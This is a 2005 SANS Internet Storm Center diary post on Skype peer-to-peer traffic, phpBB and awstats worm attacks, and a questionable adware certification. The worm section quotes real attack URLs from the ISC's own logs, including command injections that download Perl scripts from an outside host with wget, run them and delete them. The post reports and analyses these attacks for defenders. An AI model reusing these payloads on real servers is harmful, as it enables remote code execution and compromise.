Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-03-02 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Skype; Grepping Weblogs; COAST; ISTS News

Published: 2005-03-02
Last Updated: 2005-03-03 17:32:14 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Skype



Paul wrote about his firewall dropping a "huge amount" of packets after
Skype was installed on a host behind the firewall. He suspected a backdoored
version. Skype, a very popular Voice over IP (VoIP) application, does show
this behavior as a result of its normal operation. As explained here
http://www.skype.com/products/explained.html , Skype is a Peer to Peer
application very much like Napster and others. In order to relay the voice data,
it establishes connections with numerous peers, and will relay traffic for these
peers even if you are not "on the phone".

phpBB worms (and awstat exploits)



We continue to receive reports about various phpBB worms. The worms attack
various vulnerabilities, some of them are older. More recent worms will just
check random URLs, not limiting themselves to well known phpBB pages like 'viewfiles'.

awstats, another web application with vulnerabilities released recently, is another favorite.

Here a quick 'grep' result from our own ISC web server:

I am using this line of shell code to extract requests of interest:
cut -d'"' -f2 < access_log | cut -f2 -d' ' | grep ';'


Some highlights:

/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|

/diary.php?date=2004-12-25&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;
wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;
perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F
&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45
%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

/diary.php?date=2004-12-25&rush=echo%20_START_%3B%20cd%20/var/tmp;
wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;
perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B
%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527';


adding a quick 'sort -u | wc -l ' to the grep above suggests 45
unique attempts. Note that some of the URL hit look like they where
extracted from links found on other sites, and modified to insert
the exploit.

COAST



In a past diary, we published excerpts from an offer made by a Spyware/Adware
company. This letter was directed to a game software developer and included
a note that the Adware maker has hopes of obtaining a "COAST Certification".
COAST was originally founded as an anti Spy/Adware organization, but has
come under some scrutiny recently, as reader Robert pointed out. As usual,
buywer beware. Flashy "seals" may not only be just outright fake, but in
some cases you have to look deeper to figure out what they are actually
worth

ISTS News



A couple alert readers noticed that the ISTS news are missing. ISTS changed
its format, and the news will be back as soon as the new parser is working.

----------

Johannes Ullrich jullrich_ATT_sans.org,

CTO SANS Internet Storm Center

------------

http://johannes.homepc.org/blog

Keywords:
0 comment(s)
Diary Archives